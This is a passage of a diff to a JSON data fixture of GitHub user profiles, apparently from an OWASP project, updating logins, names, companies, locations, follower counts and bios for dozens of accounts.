"https://avatars.githubusercontent.com/u/58881147?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 8, + "followers_count": 35, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2014-01-27T14:05:51Z", - "updated_at": "2023-11-21T01:12:55Z", - "node_id": "MDQ6VXNlcjY1MTQ4Njc=", + "public_repositories_count": 6, + "created_at": "2019-12-14T12:43:49Z", + "updated_at": "2023-11-03T07:26:09Z", + "node_id": "MDQ6VXNlcjU4ODgxMTQ3", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "rekter0" } }, { "model": "github.user", - "pk": 2916, + "pk": 8286, "fields": { - "nest_created_at": "2024-09-12T02:36:31.764Z", - "nest_updated_at": "2024-09-12T02:36:31.764Z", - "name": "", - "login": "mukesh4804", + "nest_created_at": "2024-09-22T10:34:59.816Z", + "nest_updated_at": "2024-09-22T19:48:24.039Z", + "name": "Taiki", + "login": "Taiki-San", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43472985?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/731787?v=4", + "company": "Datadog", + "location": "France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-09-21T12:54:14Z", - "updated_at": "2023-09-06T09:56:16Z", - "node_id": "MDQ6VXNlcjQzNDcyOTg1", - "bio": "", + "following_count": 26, + "followers_count": 40, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2011-04-15T15:23:01Z", + "updated_at": "2024-05-24T12:28:22Z", + "node_id": "MDQ6VXNlcjczMTc4Nw==", + "bio": "Software security engineer having a thing for messing with low level systems. Also, jumping off planes", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Taiki__San" } }, { "model": "github.user", - "pk": 2917, + "pk": 8287, "fields": { - "nest_created_at": "2024-09-12T02:36:35.816Z", - "nest_updated_at": "2024-09-12T02:36:35.816Z", - "name": "Priyatama", - "login": "PriyatamaB", - "email": "patilpriyatama77@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/20452358?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:35:00.436Z", + "nest_updated_at": "2024-09-22T19:48:24.704Z", + "name": "Zack Allen", + "login": "zmallen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1242396?v=4", + "company": "Datadog", + "location": "USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-07-14T05:30:03Z", - "updated_at": "2024-05-02T11:48:57Z", - "node_id": "MDQ6VXNlcjIwNDUyMzU4", - "bio": "", + "following_count": 25, + "followers_count": 96, + "public_gists_count": 38, + "public_repositories_count": 63, + "created_at": "2011-12-05T17:51:16Z", + "updated_at": "2024-09-17T18:26:37Z", + "node_id": "MDQ6VXNlcjEyNDIzOTY=", + "bio": "i hack some stuff sometimes", "is_hireable": false, - "twitter_username": "" + "twitter_username": "techyteachme" } }, { "model": "github.user", - "pk": 2918, + "pk": 8288, "fields": { - "nest_created_at": "2024-09-12T02:36:37.083Z", - "nest_updated_at": "2024-09-12T02:36:37.083Z", - "name": "", - "login": "mickeyz07", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32490762?v=4", + "nest_created_at": "2024-09-22T10:35:00.747Z", + "nest_updated_at": "2024-09-22T19:48:25.025Z", + "name": "Edgars Voroboks", + "login": "NullIsNot0", + "email": "edgars.voroboks@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12268397?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2017-10-03T15:47:33Z", - "updated_at": "2024-07-30T13:38:05Z", - "node_id": "MDQ6VXNlcjMyNDkwNzYy", + "followers_count": 4, + "public_gists_count": 5, + "public_repositories_count": 88, + "created_at": "2015-05-06T07:16:05Z", + "updated_at": "2024-08-20T16:35:31Z", + "node_id": "MDQ6VXNlcjEyMjY4Mzk3", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "NullIsNot0" } }, { "model": "github.user", - "pk": 2919, + "pk": 8289, "fields": { - "nest_created_at": "2024-09-12T02:36:38.730Z", - "nest_updated_at": "2024-09-18T19:11:54.924Z", - "name": "Dario Viva", - "login": "DarioViva42", + "nest_created_at": "2024-09-22T10:35:01.694Z", + "nest_updated_at": "2024-09-22T19:48:25.984Z", + "name": "Timo", + "login": "ntimo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45972949?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6145026?v=4", "company": "", - "location": "Basel, CH", + "location": "Germany", "collaborators_count": 0, - "following_count": 4, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2018-12-18T14:58:40Z", - "updated_at": "2024-09-02T13:02:40Z", - "node_id": "MDQ6VXNlcjQ1OTcyOTQ5", - "bio": "", + "following_count": 45, + "followers_count": 25, + "public_gists_count": 4, + "public_repositories_count": 78, + "created_at": "2013-12-09T17:58:41Z", + "updated_at": "2024-09-22T18:01:00Z", + "node_id": "MDQ6VXNlcjYxNDUwMjY=", + "bio": "DevOps Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2920, + "pk": 8290, "fields": { - "nest_created_at": "2024-09-12T02:36:55.727Z", - "nest_updated_at": "2024-09-12T02:36:55.727Z", - "name": "Iliyan Peychev", - "login": "ipeychev", + "nest_created_at": "2024-09-22T10:35:02.348Z", + "nest_updated_at": "2024-09-22T19:48:26.627Z", + "name": "Deepshikha Sinha", + "login": "deepshikha-s", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/78014?v=4", - "company": "@liferay ", - "location": "Berlin, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/70747679?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 122, - "public_gists_count": 23, - "public_repositories_count": 94, - "created_at": "2009-04-26T15:15:30Z", - "updated_at": "2024-08-22T08:40:22Z", - "node_id": "MDQ6VXNlcjc4MDE0", - "bio": "Head of Engineering at Liferay Cloud Division. Worked in the area of Software Engineering the last 20+ years. Creator of several Open Source projects.", + "following_count": 56, + "followers_count": 32, + "public_gists_count": 0, + "public_repositories_count": 46, + "created_at": "2020-09-04T08:14:06Z", + "updated_at": "2024-09-16T06:50:25Z", + "node_id": "MDQ6VXNlcjcwNzQ3Njc5", + "bio": "Senior at Indian Institute of Technology (BHU), Varanasi |\r\n\r\nOpen Source Enthusiast |\r\n\r\nCyber Security Enthusiast\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2921, + "pk": 8291, "fields": { - "nest_created_at": "2024-09-12T02:37:01.427Z", - "nest_updated_at": "2024-09-12T02:37:01.427Z", - "name": "David S Morse", - "login": "dsmorse", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7193328?v=4", + "nest_created_at": "2024-09-22T10:35:02.662Z", + "nest_updated_at": "2024-09-22T19:48:26.935Z", + "name": "Somdev Sangwan", + "login": "s0md3v", + "email": "s0md3v@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26716802?v=4", "company": "", - "location": "Colorado Springs, CO", + "location": "India", "collaborators_count": 0, - "following_count": 4, - "followers_count": 11, - "public_gists_count": 3, - "public_repositories_count": 16, - "created_at": "2014-04-06T02:30:51Z", - "updated_at": "2024-08-30T00:57:10Z", - "node_id": "MDQ6VXNlcjcxOTMzMjg=", - "bio": "", - "is_hireable": false, - "twitter_username": "ds_morse" + "following_count": 0, + "followers_count": 8795, + "public_gists_count": 17, + "public_repositories_count": 54, + "created_at": "2017-03-27T14:28:19Z", + "updated_at": "2024-09-20T16:27:50Z", + "node_id": "MDQ6VXNlcjI2NzE2ODAy", + "bio": "I create free software, a lot of them.", + "is_hireable": true, + "twitter_username": "s0md3v" } }, { "model": "github.user", - "pk": 2922, + "pk": 8292, "fields": { - "nest_created_at": "2024-09-12T02:37:02.689Z", - "nest_updated_at": "2024-09-18T19:12:04.195Z", + "nest_created_at": "2024-09-22T10:35:03.290Z", + "nest_updated_at": "2024-09-22T19:48:27.576Z", "name": "", - "login": "SamuraiWTF", + "login": "vijayasija99", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17264440?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43239073?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 40, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2016-02-16T04:03:32Z", - "updated_at": "2018-09-21T21:04:03Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjE3MjY0NDQw", + "public_repositories_count": 2, + "created_at": "2018-09-13T11:45:39Z", + "updated_at": "2022-09-26T17:20:31Z", + "node_id": "MDQ6VXNlcjQzMjM5MDcz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433303,149 +693227,149 @@ }, { "model": "github.user", - "pk": 2923, + "pk": 8293, "fields": { - "nest_created_at": "2024-09-12T02:37:05.919Z", - "nest_updated_at": "2024-09-12T02:37:35.049Z", - "name": "Mic", - "login": "mgillam", - "email": "mic@secureideas.com", - "avatar_url": "https://avatars.githubusercontent.com/u/4037926?v=4", - "company": "Secure Ideas", - "location": "Kingston, ON", + "nest_created_at": "2024-09-22T10:35:03.609Z", + "nest_updated_at": "2024-09-22T19:48:27.896Z", + "name": "pyllyukko", + "login": "pyllyukko", + "email": "pyllyukko@maimed.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1058704?v=4", + "company": "", + "location": "Finland", "collaborators_count": 0, - "following_count": 3, - "followers_count": 29, - "public_gists_count": 2, - "public_repositories_count": 13, - "created_at": "2013-04-02T14:38:51Z", - "updated_at": "2024-02-28T15:09:07Z", - "node_id": "MDQ6VXNlcjQwMzc5MjY=", - "bio": "Application security consultant with a focus on developer education.", + "following_count": 31, + "followers_count": 120, + "public_gists_count": 20, + "public_repositories_count": 39, + "created_at": "2011-09-17T19:05:49Z", + "updated_at": "2024-09-18T15:51:52Z", + "node_id": "MDQ6VXNlcjEwNTg3MDQ=", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "pyllyukko" } }, { "model": "github.user", - "pk": 2924, + "pk": 8294, "fields": { - "nest_created_at": "2024-09-12T02:37:11.985Z", - "nest_updated_at": "2024-09-12T02:37:25.134Z", - "name": "Cory Sabol", - "login": "corysabol", + "nest_created_at": "2024-09-22T10:35:03.920Z", + "nest_updated_at": "2024-09-22T19:48:28.206Z", + "name": "YAGIHASHI Yu", + "login": "yagihash", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4594324?v=4", - "company": "@secureideasllc @ProfessionallyEvil @NiceDuckGames", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1553908?v=4", + "company": "", + "location": "Tokyo", "collaborators_count": 0, - "following_count": 24, - "followers_count": 31, - "public_gists_count": 6, - "public_repositories_count": 66, - "created_at": "2013-06-02T17:55:57Z", - "updated_at": "2024-09-11T10:37:51Z", - "node_id": "MDQ6VXNlcjQ1OTQzMjQ=", - "bio": "Senior Security Consultant. I like to pretend that I design games in my spare time.", + "following_count": 46, + "followers_count": 33, + "public_gists_count": 9, + "public_repositories_count": 44, + "created_at": "2012-03-19T18:46:45Z", + "updated_at": "2024-06-05T15:16:50Z", + "node_id": "MDQ6VXNlcjE1NTM5MDg=", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "yagihashoo" } }, { "model": "github.user", - "pk": 2925, + "pk": 8295, "fields": { - "nest_created_at": "2024-09-12T02:37:13.593Z", - "nest_updated_at": "2024-09-12T02:37:36.692Z", - "name": "Jason", - "login": "JGillam", + "nest_created_at": "2024-09-22T10:35:04.239Z", + "nest_updated_at": "2024-09-22T19:48:28.528Z", + "name": "Gwendal Le Coguic", + "login": "gwen001", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5461356?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5347721?v=4", + "company": "10degres", + "location": "Paris - France", "collaborators_count": 0, - "following_count": 4, - "followers_count": 86, - "public_gists_count": 1, - "public_repositories_count": 24, - "created_at": "2013-09-15T02:40:52Z", - "updated_at": "2024-09-11T20:00:31Z", - "node_id": "MDQ6VXNlcjU0NjEzNTY=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 11, + "followers_count": 2483, + "public_gists_count": 10, + "public_repositories_count": 58, + "created_at": "2013-08-30T15:26:42Z", + "updated_at": "2024-04-22T07:27:25Z", + "node_id": "MDQ6VXNlcjUzNDc3MjE=", + "bio": "Bug hunter, tool maker.", + "is_hireable": true, + "twitter_username": "gwendallecoguic" } }, { "model": "github.user", - "pk": 2926, + "pk": 8296, "fields": { - "nest_created_at": "2024-09-12T02:37:13.986Z", - "nest_updated_at": "2024-09-12T02:37:34.242Z", + "nest_created_at": "2024-09-22T10:35:04.880Z", + "nest_updated_at": "2024-09-22T19:48:29.147Z", "name": "", - "login": "elreydetoda", + "login": "somechris", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10230166?v=4", - "company": "@ProfessionallyEvil, @SamuraiWTF, @secureideasllc", - "location": "th3 Interw3bz", + "avatar_url": "https://avatars.githubusercontent.com/u/3330451?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 66, - "followers_count": 69, - "public_gists_count": 34, - "public_repositories_count": 131, - "created_at": "2014-12-18T08:11:19Z", - "updated_at": "2024-08-14T15:41:52Z", - "node_id": "MDQ6VXNlcjEwMjMwMTY2", - "bio": "former member of @49thSecurityDivision and now work as PentesterOps/Developer at @secureideasllc\r\n\r\nmessage me at twitter: https://twitter.com/RonJonArod", + "following_count": 0, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2013-01-21T16:24:55Z", + "updated_at": "2023-04-10T21:39:05Z", + "node_id": "MDQ6VXNlcjMzMzA0NTE=", + "bio": "", "is_hireable": false, - "twitter_username": "RonJonArod" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2927, + "pk": 8297, "fields": { - "nest_created_at": "2024-09-12T02:37:26.347Z", - "nest_updated_at": "2024-09-13T05:03:35.622Z", - "name": "x0341", - "login": "x0341", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1771943?v=4", - "company": "", - "location": "Around", + "nest_created_at": "2024-09-22T10:35:05.195Z", + "nest_updated_at": "2024-09-22T19:48:29.452Z", + "name": "Umar Farook", + "login": "umarfarook882", + "email": "umarfarook882@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22318677?v=4", + "company": "Fools Of Security Community ", + "location": "Bangalore", "collaborators_count": 0, - "following_count": 18, - "followers_count": 6, - "public_gists_count": 17, - "public_repositories_count": 159, - "created_at": "2012-05-23T23:03:55Z", - "updated_at": "2024-09-09T18:15:01Z", - "node_id": "MDQ6VXNlcjE3NzE5NDM=", - "bio": "", - "is_hireable": false, + "following_count": 12, + "followers_count": 81, + "public_gists_count": 7, + "public_repositories_count": 54, + "created_at": "2016-09-20T10:11:25Z", + "updated_at": "2024-09-10T15:52:55Z", + "node_id": "MDQ6VXNlcjIyMzE4Njc3", + "bio": "Security Researcher | Malware RE | DevSecOps | Dev - (C,x86 ASM, Python, NodeJs) | WAF & RASP | Sandbox Dev | LibVMI - Hypervisor Research :)", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2928, + "pk": 8298, "fields": { - "nest_created_at": "2024-09-12T02:37:27.221Z", - "nest_updated_at": "2024-09-12T02:37:27.221Z", + "nest_created_at": "2024-09-22T10:35:05.506Z", + "nest_updated_at": "2024-09-22T19:48:29.768Z", "name": "", - "login": "jcrew99", + "login": "ygrek", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37361441?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/104087?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2018-03-14T06:51:26Z", - "updated_at": "2023-12-27T03:31:26Z", - "node_id": "MDQ6VXNlcjM3MzYxNDQx", + "following_count": 45, + "followers_count": 109, + "public_gists_count": 2, + "public_repositories_count": 43, + "created_at": "2009-07-12T08:47:52Z", + "updated_at": "2024-07-08T03:32:42Z", + "node_id": "MDQ6VXNlcjEwNDA4Nw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433453,24 +693377,24 @@ }, { "model": "github.user", - "pk": 2929, + "pk": 8299, "fields": { - "nest_created_at": "2024-09-12T02:37:28.053Z", - "nest_updated_at": "2024-09-12T02:37:28.053Z", - "name": "", - "login": "lekalmouk", + "nest_created_at": "2024-09-22T10:35:05.824Z", + "nest_updated_at": "2024-09-22T19:48:30.156Z", + "name": "oct0pus7", + "login": "oct0pus7", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53940979?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/55663970?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2019-08-09T12:10:57Z", - "updated_at": "2023-03-07T15:20:04Z", - "node_id": "MDQ6VXNlcjUzOTQwOTc5", + "created_at": "2019-09-22T16:18:56Z", + "updated_at": "2024-07-27T19:11:20Z", + "node_id": "MDQ6VXNlcjU1NjYzOTcw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433478,74 +693402,74 @@ }, { "model": "github.user", - "pk": 2930, + "pk": 8300, "fields": { - "nest_created_at": "2024-09-12T02:37:28.877Z", - "nest_updated_at": "2024-09-12T02:37:28.877Z", - "name": "Aaron Moss", - "login": "Bl0ckbuster", - "email": "kerrjar@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/12902666?v=4", - "company": "Secure Ideas", - "location": "Tulsa, OK", + "nest_created_at": "2024-09-22T10:35:06.149Z", + "nest_updated_at": "2024-09-22T19:48:30.464Z", + "name": "范云飞", + "login": "NiceYouKnow", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34054835?v=4", + "company": "", + "location": "China", "collaborators_count": 0, - "following_count": 51, + "following_count": 2, "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 4, - "created_at": "2015-06-15T22:16:44Z", - "updated_at": "2024-09-10T02:32:03Z", - "node_id": "MDQ6VXNlcjEyOTAyNjY2", - "bio": "Senior Consultant @ Secure Ideas", + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2017-11-28T07:25:26Z", + "updated_at": "2024-09-12T05:53:29Z", + "node_id": "MDQ6VXNlcjM0MDU0ODM1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2931, + "pk": 8301, "fields": { - "nest_created_at": "2024-09-12T02:37:29.685Z", - "nest_updated_at": "2024-09-12T02:37:29.685Z", - "name": "Daniel Lopez", - "login": "Verdoso", + "nest_created_at": "2024-09-22T10:35:06.469Z", + "nest_updated_at": "2024-09-22T19:48:30.779Z", + "name": "Will Woodson", + "login": "wjwoodson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5923466?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7348076?v=4", "company": "", - "location": "Illes Balears, Spain", + "location": "USA", "collaborators_count": 0, - "following_count": 2, - "followers_count": 9, - "public_gists_count": 50, - "public_repositories_count": 26, - "created_at": "2013-11-12T21:24:52Z", - "updated_at": "2024-08-16T15:02:57Z", - "node_id": "MDQ6VXNlcjU5MjM0NjY=", + "following_count": 5, + "followers_count": 31, + "public_gists_count": 5, + "public_repositories_count": 34, + "created_at": "2014-04-19T17:30:15Z", + "updated_at": "2024-06-24T11:52:19Z", + "node_id": "MDQ6VXNlcjczNDgwNzY=", "bio": "", "is_hireable": false, - "twitter_username": "greeneyed_dlj" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2932, + "pk": 8302, "fields": { - "nest_created_at": "2024-09-12T02:37:30.963Z", - "nest_updated_at": "2024-09-12T02:37:39.183Z", - "name": "Kevin Johnson", - "login": "secureideas", - "email": "kevin@secureideas.com", - "avatar_url": "https://avatars.githubusercontent.com/u/544854?v=4", - "company": "Secure Ideas", - "location": "Orange Park, FL", + "nest_created_at": "2024-09-22T10:35:07.097Z", + "nest_updated_at": "2024-09-22T19:48:31.409Z", + "name": "Pásztor Gábor", + "login": "gpasztor87", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3843377?v=4", + "company": "", + "location": "Debrecen, Hungary", "collaborators_count": 0, - "following_count": 5, - "followers_count": 38, + "following_count": 21, + "followers_count": 32, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2011-01-03T03:08:00Z", - "updated_at": "2024-07-02T21:35:35Z", - "node_id": "MDQ6VXNlcjU0NDg1NA==", + "public_repositories_count": 15, + "created_at": "2013-03-12T14:19:14Z", + "updated_at": "2024-08-09T21:12:52Z", + "node_id": "MDQ6VXNlcjM4NDMzNzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433553,199 +693477,174 @@ }, { "model": "github.user", - "pk": 2933, + "pk": 8303, "fields": { - "nest_created_at": "2024-09-12T02:37:40.420Z", - "nest_updated_at": "2024-09-18T19:12:15.997Z", - "name": "", - "login": "Risk-Assessment-Framework", + "nest_created_at": "2024-09-22T10:35:07.404Z", + "nest_updated_at": "2024-09-22T19:48:31.718Z", + "name": "Anna Rajendran", + "login": "annawinkler", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/63029581?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3526523?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-04-02T02:08:35Z", - "updated_at": "2020-04-29T21:03:20Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjYzMDI5NTgx", - "bio": "", + "following_count": 12, + "followers_count": 16, + "public_gists_count": 36, + "public_repositories_count": 82, + "created_at": "2013-02-10T18:49:18Z", + "updated_at": "2024-08-28T11:25:52Z", + "node_id": "MDQ6VXNlcjM1MjY1MjM=", + "bio": "Tool & API software development, Yoga Instructor, Applied Linguistics, & cooking & dance.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2934, + "pk": 8304, "fields": { - "nest_created_at": "2024-09-12T02:37:43.513Z", - "nest_updated_at": "2024-09-18T19:12:11.241Z", - "name": "JUHIE", - "login": "juhiechandra", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75068056?v=4", - "company": "", - "location": "India", + "nest_created_at": "2024-09-22T10:35:07.729Z", + "nest_updated_at": "2024-09-22T19:48:58.049Z", + "name": "Peter Bittner", + "login": "bittner", + "email": "django@bittner.it", + "avatar_url": "https://avatars.githubusercontent.com/u/665072?v=4", + "company": "@painless-software ", + "location": "Kreuzlingen, Switzerland", "collaborators_count": 0, - "following_count": 266, - "followers_count": 135, - "public_gists_count": 0, - "public_repositories_count": 86, - "created_at": "2020-11-26T08:58:55Z", - "updated_at": "2024-09-10T05:57:47Z", - "node_id": "MDQ6VXNlcjc1MDY4MDU2", - "bio": "", + "following_count": 34, + "followers_count": 196, + "public_gists_count": 21, + "public_repositories_count": 95, + "created_at": "2011-03-12T00:30:20Z", + "updated_at": "2024-09-16T11:24:38Z", + "node_id": "MDQ6VXNlcjY2NTA3Mg==", + "bio": "Continuous delivery for a living. A perfectionist with deadlines, just like Django.", "is_hireable": true, - "twitter_username": "CerulianJ" + "twitter_username": "peterbittner" } }, { "model": "github.user", - "pk": 2935, + "pk": 8305, "fields": { - "nest_created_at": "2024-09-12T02:37:57.397Z", - "nest_updated_at": "2024-09-18T19:12:21.855Z", - "name": "Viktor Solovev", - "login": "dreddsa5dies", - "email": "viktor.vladimirovich.solovev@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2690403?v=4", + "nest_created_at": "2024-09-22T10:35:08.719Z", + "nest_updated_at": "2024-09-22T19:48:32.986Z", + "name": "", + "login": "meetug", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39498645?v=4", "company": "", - "location": "Moscow", + "location": "", "collaborators_count": 0, - "following_count": 21, - "followers_count": 266, - "public_gists_count": 1, - "public_repositories_count": 36, - "created_at": "2012-10-31T10:34:43Z", - "updated_at": "2024-08-30T10:05:52Z", - "node_id": "MDQ6VXNlcjI2OTA0MDM=", - "bio": "Life, Liberty and the Pursuit of Happiness", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-05-21T18:24:28Z", + "updated_at": "2020-11-04T17:58:43Z", + "node_id": "MDQ6VXNlcjM5NDk4NjQ1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2936, + "pk": 8306, "fields": { - "nest_created_at": "2024-09-12T02:38:02.841Z", - "nest_updated_at": "2024-09-18T19:12:45.969Z", - "name": "Saeed Dehqan", - "login": "saeeddhqan", + "nest_created_at": "2024-09-22T10:35:09.041Z", + "nest_updated_at": "2024-09-22T19:48:33.300Z", + "name": "joost de keijzer", + "login": "joostdekeijzer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31902891?v=4", - "company": "OWASP", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/216672?v=4", + "company": "DKZR", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 3, - "followers_count": 111, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2017-09-12T20:24:27Z", - "updated_at": "2024-08-27T10:58:56Z", - "node_id": "MDQ6VXNlcjMxOTAyODkx", + "following_count": 1, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 52, + "created_at": "2010-03-05T16:18:58Z", + "updated_at": "2024-08-14T14:18:31Z", + "node_id": "MDQ6VXNlcjIxNjY3Mg==", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2937, + "pk": 8307, "fields": { - "nest_created_at": "2024-09-12T02:38:15.502Z", - "nest_updated_at": "2024-09-18T19:12:49.556Z", - "name": "OWASP Find Security Bugs", - "login": "find-sec-bugs", + "nest_created_at": "2024-09-22T10:35:09.368Z", + "nest_updated_at": "2024-09-22T19:48:33.618Z", + "name": "", + "login": "coolt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16162781?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3684638?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 24, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2015-12-05T06:50:49Z", - "updated_at": "2019-03-28T21:52:11Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjE2MTYyNzgx", - "bio": "The SpotBugs plugin for security audits of Java web applications and Android applications", - "is_hireable": false, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 2938, - "fields": { - "nest_created_at": "2024-09-12T02:38:19.449Z", - "nest_updated_at": "2024-09-12T02:38:19.449Z", - "name": "Jesse Glick", - "login": "jglick", - "email": "jglick@cloudbees.com", - "avatar_url": "https://avatars.githubusercontent.com/u/154109?v=4", - "company": "@cloudbees", - "location": "Chapel Hill NC", - "collaborators_count": 0, - "following_count": 2, - "followers_count": 448, - "public_gists_count": 36, - "public_repositories_count": 553, - "created_at": "2009-11-16T23:06:38Z", - "updated_at": "2024-09-05T18:23:54Z", - "node_id": "MDQ6VXNlcjE1NDEwOQ==", + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2013-02-24T10:06:52Z", + "updated_at": "2020-12-01T18:15:27Z", + "node_id": "MDQ6VXNlcjM2ODQ2Mzg=", "bio": "", "is_hireable": false, - "twitter_username": "tyvole" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2939, + "pk": 8308, "fields": { - "nest_created_at": "2024-09-12T02:38:22.281Z", - "nest_updated_at": "2024-09-12T02:38:22.281Z", - "name": "Archimedes Trajano", - "login": "trajano", + "nest_created_at": "2024-09-22T10:35:09.684Z", + "nest_updated_at": "2024-09-22T19:48:33.938Z", + "name": "", + "login": "Zerorigin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/110627?v=4", - "company": "Trajano", + "avatar_url": "https://avatars.githubusercontent.com/u/36463444?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 55, - "public_gists_count": 24, - "public_repositories_count": 278, - "created_at": "2009-07-31T14:04:49Z", - "updated_at": "2024-09-10T21:50:46Z", - "node_id": "MDQ6VXNlcjExMDYyNw==", - "bio": "My direct e-mail is arch AT trajano DOT net", + "following_count": 5, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2018-02-14T02:11:35Z", + "updated_at": "2024-07-30T02:33:30Z", + "node_id": "MDQ6VXNlcjM2NDYzNDQ0", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2940, + "pk": 8309, "fields": { - "nest_created_at": "2024-09-12T02:38:26.828Z", - "nest_updated_at": "2024-09-12T02:38:26.828Z", - "name": "Adam Gabryś", - "login": "agabrys", + "nest_created_at": "2024-09-22T10:35:10.328Z", + "nest_updated_at": "2024-09-22T19:48:34.570Z", + "name": "Christian S.J. Peron", + "login": "csjperon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10604335?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19933123?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 15, - "public_gists_count": 6, - 